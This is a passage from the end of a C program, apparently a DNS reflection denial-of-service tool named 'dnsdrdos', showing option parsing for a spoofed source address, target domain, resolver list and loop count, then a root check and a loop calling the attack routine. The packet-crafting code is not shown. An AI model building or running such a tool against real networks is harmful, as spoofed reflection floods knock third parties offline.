1212. while ((c = getopt(argc, argv, "f:s:d:l:VH")) != -1) {
1213. switch (c) {
1214. case 'f':
1215. job->file = optarg;
1216. break;
1217. case 's':
1218. job->spoof_addr = optarg;
1219. break;
1220. case 'd':
1221. job->domain = optarg;
1222. break;
1223. case 'l':
1224. job->loops = (unsigned int) ATOI(optarg);
1225. break;
1226. case 'V':
1227. puts(VERSION);
1228. __EXIT_SUCCESS;
1229. break;
1230. case 'H':
1231. usage();
1232. break;
1233. __EXIT_SUCCESS;
1234. }
1235. }
1236.  
1237. check_args(job);
1238.  
1239. job->num_addrs = count_lines(job->file);
1240. job->addrs = read_lines(job->file, job->num_addrs);
1241.  
1242. check_uid();
1243.  
1244. for (i = 0; i < job->loops; i++) {
1245. for (c = 0; c < job->num_addrs; c++) {
1246. run_dnsdrdos(job, c);
1247. }
1248. }
1249. printf("\n");
1250.  
1251. free_dnsdrdos(job);
1252.  
1253. return 0;
1254. }
1255.  
1256. /* EOF */